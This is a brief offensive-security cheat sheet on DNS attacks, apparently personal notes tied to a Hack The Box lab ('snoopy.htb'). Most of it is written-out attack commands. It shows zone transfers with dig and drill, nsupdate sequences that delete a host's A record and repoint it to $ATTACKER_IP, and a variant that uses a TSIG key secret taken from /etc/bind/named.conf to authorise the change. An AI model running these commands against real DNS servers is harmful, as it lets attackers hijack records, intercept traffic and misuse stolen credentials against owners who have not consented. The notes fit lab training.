# DNS

## Subdomain Enumeration

* Get all the info via 
```sh
dig     @$TARGET_DNS $DOMAIN axfr
drill   @$TARGET_DNS $DOMAIN axfr
```

* [subrake](https://github.com/hash3liZer/Subrake.git)


## Join a Domain

* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk 
```sh
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
* Check domain by querying the subdomain's A record via dig/drill/nslookup

### Found Secrets for Keys 

If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
namefromtext
keycreate

server <domain>
update add mail.snoopy.htb.  86400  IN A $ATTACKER_IP
send
```

Copy the lines, every space counts as it has to be exactly like in the example